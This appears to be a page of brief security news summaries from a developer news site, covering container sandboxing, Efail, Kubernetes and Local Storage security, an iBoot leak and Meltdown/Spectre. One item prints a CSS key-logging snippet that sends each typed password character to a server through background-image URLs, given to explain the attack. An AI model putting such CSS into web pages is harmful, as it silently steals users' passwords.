
Security

InfoSec, DevSec, Penetration Testing, etc.
34 Stories

Jessie Frazelle blog.jessfraz.com

Containers, security, and echo chambers

Jessie Frazelle: There seems to be some confusion around sandboxing containers as of late, mostly because of the recent launch of gvisor... There is a large amount of ignorance towards the existing defaults to make containers secure. Which is crazy since I have written many blog posts on it and given many talks on the subject. Jessie has been doing the yeoman's work of Linux kernel isolation and making containers secure for a while now, but much of that work has been overlooked or disregarded by others in the community. I'm on the outside looking in at this situation, so it's tough to call exactly what's going on, but according to Jessie: When you work at a large organization you are surrounded by an echo chamber. So if everyone in the org is saying “containers are not secure,” you are bound to believe it and not research actual facts. That doesn't mean Jessie thinks containers are secure (click through to read her take on that). There's a lot to dig into here and think about. I'll pull out one last point: I am not trying to throw shade at gvisor but merely clear up some FUD in the world of open source marketing. I truly believe that people choosing projects to use should research into them and not just choose something shiny that came out of Big Corp. Now that's a sentiment I can get behind! Oh, and listen to this related episode of The Changelog if you haven't yet. It's a must-listen for all developers.


Medium

An Efail postmortem

Efail caused a panic at the disco: ... some researchers in Europe published a paper with the bombshell title “Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels.” There were a lot of researchers on that team but in the hours after release Sebastian Schinzel took the point on Twitter for the group. Oh, my, did the email crypto world blow up. The following are some thoughts that have benefited from a few days for things to settle. Lots of interesting insights here, perhaps most controversially how the EFF's handling of the situation may have done more harm than good in the author's opinion. Also: we could stand to have a renewed appreciation for OpenPGP’s importance to not just email crypto, but the global economy. I can say I definitely have more appreciation for it after reading this than I did before. I hadn't thought about its influence (which is huge) outside of encrypted email.


Zack Whittaker www.zdnet.com

I asked Apple for all my data. Here's what was sent back.

Zack Whittaker writes for Zero Day: Apple gave me all the data it collected on me since I bought my first iPhone — in 2010. This is what has largely stood out to me in the ongoing discussion about what data the four have on me and how they use it... As insightful as it was, Apple's treasure trove of my personal data is a drop in the ocean to what social networks or search giants have on me, because Apple is primarily a hardware maker and not ad-driven, like Facebook and Google, which use your data to pitch you ads. Want to request your data? It takes just a few seconds...


Google

gVisor – a sandboxed container runtime

Why does this exist? Containers are not a sandbox. While containers have revolutionized how we develop, package, and deploy applications, running untrusted or potentially malicious code without additional isolation is not a good idea. The efficiency and performance gains from using a single, shared kernel also mean that container escape is possible with a single vulnerability. gVisor takes a distinct approach to container sandboxing and makes a different set of technical trade-offs compared to existing sandbox technologies, thus providing new tools and ideas for the container security landscape.


GitHub

⚡️ Let's Encrypt strikes again, this time in your GitHub Pages

Parker Moore, on GitHub's blog: Today, custom domains on GitHub Pages are gaining support for HTTPS as well, meaning over a million GitHub Pages sites will be served over HTTPS. What's more: We have partnered with the certificate authority Let’s Encrypt on this project. As supporters of Let’s Encrypt’s mission to make the web more secure for everyone, we’ve officially become Silver-level sponsors of the initiative. If your custom domain uses CNAME or ALIAS records, no action is required to go HTTPS. If (like me), you have a custom domain using A records, follow along here.


github.com

A best practice guide to Kubernetes security

K8s is a powerful platform which can be abused in many ways if not configured properly. Contributors to this guide are running Kubernetes in production and worked on several K8s projects to learn about security flaws the hard way. This guide scores major points for having battle-hardened contributors. I also dig how they indicate the severity/importance of each topic with an emoji. Look out for the 💥s!


Griffin Byatt github.com

Sobelow – a security-focused static analyzer for the Phoenix framework

Yesterday, Griffin Byatt hit me up in Slack and let me know we had a few security holes. 😱 After a quick discussion about the magnitude of said holes, he informed me that he'd found them by running our code through his static analysis tool, Sobelow. Say what? For security researchers, it is a useful tool for getting a quick view of points-of-interest. For project maintainers, it can be used to prevent the introduction of a number of common vulnerabilities. I asked Griffin if he'd be kind enough to open a PR with the fixes so we can link it up and use it to show folks how handy this tool is. So that's what he did and that's what I'm doing! 💚


jakearchibald.com

Third party CSS is not safe

Jake Archibald goes much deeper on our previous report of CSS key logging. Some folks called for browsers to 'fix' it. Some folks dug a bit deeper and saw that it only affected sites built in React-like frameworks, and pointed the finger at React. But the real problem is thinking that third party content is 'safe'. Jake shared many examples as well as ways to mitigate these types of attacks.


github.com

CSS key logging is a thing?! 😱

Turns out it definitely can be, as long as you are using a component-style JavaScript tool (such as React) that updates input values on every keypress. Here's how it works: Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image. Add some CSS that looks like this: input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); } When the user types an a into the password field, it will hit your server for logging. Dastardly!


motherboard.vice.com

Someone published the source code to iBoot (a critical piece of iOS) on GitHub

This is being called "the biggest leak in history", which is probably not true (remember when Gizmodo got its grubby paws on the iPhone 4?). But it's likely the biggest leak in Apple software history. Motherboard says it... could pave the way for hackers and security researchers to find vulnerabilities in iOS and make iPhone jailbreaks easier to achieve. That's plausible. iBoot is responsible for ensuring a trusted boot of the O/S. The specific version posted was from iOS 9, but this portion of code probably doesn't get updated as often as the Music app, so it's likely still relevant. Apple promptly posted a DMCA takedown request, and the source code is no longer publicly available. But we developers know all too well that once source code is made public, there's no taking it private again.


www.rdegges.com

Please stop using Local Storage

Randall Degges examines the good and bad uses of Local Storage. tl;dr: don't use it to store sensitive data. Almost every day I stumble across a new website storing sensitive user information in local storage and it bothers me to know that so many developers are opening themselves up to catastrophic security issues by doing so. Let’s have a heart-to-heart and talk about local storage and why you should stop using it to store session data.


Medium

Meltdown and Spectre Explained

If some or most of what you've heard or read about Meltdown and Spectre has gone over your head, then you should 💯 read this technical explainer from Matt Klein (also known for being the creator of Envoy). Matt: I have not seen a good mid-level introduction to the vulnerabilities and mitigations. In this post I’m going to attempt to correct that by providing a gentle introduction to the hardware and software background required to understand the vulnerabilities, a discussion of the vulnerabilities themselves, as well as a discussion of the current mitigations. Matt goes on to share graphic charts of CPUs, virtual memory, and code samples to break down the exploit.
